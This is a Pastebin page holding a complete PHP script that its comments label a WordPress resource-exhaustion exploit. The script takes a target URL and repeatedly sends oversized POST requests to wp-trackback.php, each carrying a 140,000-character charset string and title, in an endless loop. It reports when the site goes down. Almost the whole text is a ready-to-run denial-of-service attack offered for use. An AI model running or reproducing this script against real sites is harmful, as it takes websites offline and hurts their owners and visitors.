Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- //wordpress Resource exhaustion Exploit
- //http://rooibo.wordpress.com/
- //security@wordpress.org contacted and get a response,
- //but no solution available.
- if(count($argv) < 2) {
- echo "You need to specify a url to attack\n";
- exit;
- }
- $url = $argv[1];
- $data = parse_url($url);
- if(count($data) < 2) {
- echo "The url should have http:// in front of it, and should be complete.\n";
- exit;
- }
- if(count($data) == 2) {
- $path = "";
- } else {
- $path = $data['path'];
- }
- $path = trim($path,'/');
- $path .= '/wp-trackback.php';
- if($path{0} != '/') {
- $path = '/'.$path;
- }
- $b = "";
- $b = str_pad($b,140000,'ABCEDFG');
- $b = utf8_encode($b);
- $charset = "";
- $charset = str_pad($charset,140000,"UTF-8,");
- $str = 'charset='.urlencode($charset);
- $str .= '&url=www.example.com';
- $str .= '&title='.$b;
- $str .= '&blog_name=lol';
- $str .= '&excerpt=lol';
- $count = 0;
- while(1) {
- $fp = @fsockopen($data['host'],80);
- if(!$fp) {
- if($count > 0) {
- echo "down!!!!\n";
- exit;
- }
- echo "unable to connect to: ".$data['host']."\n";
- exit;
- }
- fputs($fp, "POST $path HTTP/1.1\r\n");
- fputs($fp, "Host: ".$data['host']."\r\n");
- fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
- fputs($fp, "Content-length: ".strlen($str)."\r\n");
- fputs($fp, "Connection: close\r\n\r\n");
- fputs($fp, $str."\r\n\r\n");
- echo "hit!\n";
- $count++;
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
